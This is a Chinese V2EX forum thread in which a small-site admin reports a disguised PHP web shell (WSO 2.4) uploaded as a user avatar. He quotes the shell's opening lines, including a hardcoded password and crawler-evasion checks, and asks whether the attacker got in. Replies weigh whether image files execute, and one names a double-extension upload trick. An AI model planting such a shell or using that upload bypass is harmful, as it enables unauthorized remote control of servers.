小站被挂马了。。。

一个小论坛，用的是thinksaas，对方注册账号，上传头像（伪装木马），直接打头像网址显示部分代码如下：

<?php # Web Shell by oRb
$auth_pass = md5("123456");
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}

@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');

....................

请问怎样判断对方是否拿到了权限呢？

GASALA

2013-03-11 18:21:32 +08:00

@jimmy2010 打开那个人注册的页面杀软会弹出提示。。。

我只贴出了一部分代码。。。你的意思是他这个马没有执行吗？

icevil

2013-03-11 18:39:46 +08:00

@GASALA 杀软是特征码识别，所以会弹出提示。
除非你设置了.jpg等图片后缀解析为php，否则这样的静态文件是不会执行的吧。

icevil

2013-03-11 19:28:29 +08:00

@GASALA 估计测试漏洞什么的吧，具体还要上传的人来回答。。
你后台查询上传这头像的账号的ip然后block啊~

jybox

2013-03-11 19:37:24 +08:00

这个黑阔很可能已经得手了，现在他可以远程执行命令，至于是root权限还是www-data的权限，要看你的服务器的权限配置.

他很可能在不止一个文件中挂了后门.

GASALA

2013-03-11 19:47:56 +08:00

@jybox 对比之后没发现有系统文件被修改过。。。我已经删除了那个伪装的文件。

请问怎样知道有没有登入过root或者怎么知道对方是否拥有了权限？

jimmy2010

2013-03-11 22:00:47 +08:00

@jybox
@GASALA
不用惊慌，jpg格式的文件在可解析php的服务器上是不会被解析的。对方在测试能否上传木马而已，除非将木马以.php格式上传，才有可能执行。或者利用php的解析漏洞，上传成XX.php.rar之类的，也可以执行。总之，纯图片不用担心，不管图片的内容是什么，只要确保.jpg这个后缀无法修改就行

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/62605

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.